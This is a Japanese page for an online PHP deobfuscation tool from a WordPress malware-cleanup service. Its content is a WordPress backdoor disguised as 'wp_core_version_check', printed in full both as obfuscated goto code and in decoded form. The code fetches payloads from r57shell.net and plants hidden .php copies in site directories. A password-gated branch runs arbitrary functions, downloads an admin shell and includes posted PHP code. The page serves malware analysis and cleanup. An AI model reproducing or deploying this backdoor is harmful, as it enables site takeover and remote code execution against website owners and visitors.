Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. -->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?><?php
if (!function_exists("wp_core_version_check")) {
function wp_core_version_check()
{
$document_file = $_SERVER["SCRIPT_FILENAME"];
$request_uri = $_SERVER["REQUEST_URI"];
$parse_url = parse_url($request_uri);
$uri_path = $parse_url["path"];
$uri_path = dirname($uri_path);
$file_path = dirname($document_file);
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, '', $file_path);
}
$hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
if (is_writable(sys_get_temp_dir())) {
$tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
} else {
$tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
}
if (@$_GET["slince_golden"]) {
echo "<!-- //Silence is golden. -->";
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
}
if (md5(sha1(@$_GET["is"])) == $response) {
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
if (@$_GET["m"]) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/mini_admin.txt");
}
$file_name_path = @$_GET["m"] . "gagal.php";
@file_put_contents($file_name_path, $response);
echo $file_name_path;
}
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
$tmp = tmpfile();
$tmpf = stream_get_meta_data($tmp);
$tmpf = $tmpf["uri"];
fwrite($tmp, $request);
$ret = (include $tmpf);
fclose($tmp);
return $ret;
}
print_r(basic_code_extensions($_POST["l"]));
}
}
exit;
}
if (!file_exists($tmp_file)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
}
}
$dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
$dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
if (!@preg_match("#wp-content#", $d)) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
}
}
}
}
wp_core_version_check();
}■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.